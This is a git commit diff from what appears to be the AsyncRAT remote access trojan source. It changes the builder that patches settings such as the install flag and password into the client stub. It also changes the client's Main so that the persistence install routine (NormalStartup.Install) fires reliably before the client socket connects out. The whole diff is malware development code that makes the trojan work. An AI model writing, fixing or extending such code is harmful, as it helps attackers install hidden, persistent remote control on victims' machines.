UPDATE
This commit is contained in:
parent
64e4b5b5a9
commit
80fab95e98
@ -50,7 +50,7 @@ namespace AsyncRAT_Sharp.Forms
|
||||
method.Body.Instructions[i].Operand = textFilename.Text;
|
||||
|
||||
if (method.Body.Instructions[i].Operand.ToString() == "false")
|
||||
method.Body.Instructions[i].Operand = checkBox1.Checked.ToString();
|
||||
method.Body.Instructions[i].Operand = checkBox1.Checked.ToString().ToLower();
|
||||
|
||||
if (method.Body.Instructions[i].Operand.ToString() == "NYAN CAT")
|
||||
method.Body.Instructions[i].Operand = Settings.Password;
|
||||
|
Binary file not shown.
@ -1,6 +1,7 @@
|
||||
using System.Threading;
|
||||
using Client.Sockets;
|
||||
using Client.Install;
|
||||
using System;
|
||||
|
||||
// │ Author : NYAN CAT
|
||||
// │ Name : AsyncRAT // Simple Socket
|
||||
@ -18,7 +19,7 @@ namespace Client
|
||||
|
||||
static void Main()
|
||||
{
|
||||
if (Settings.Install == "true")
|
||||
if (Convert.ToBoolean(Settings.Install))
|
||||
NormalStartup.Install();
|
||||
|
||||
ClientSocket.InitializeClient();
|
||||
|
Loading…
x
Reference in New Issue
Block a user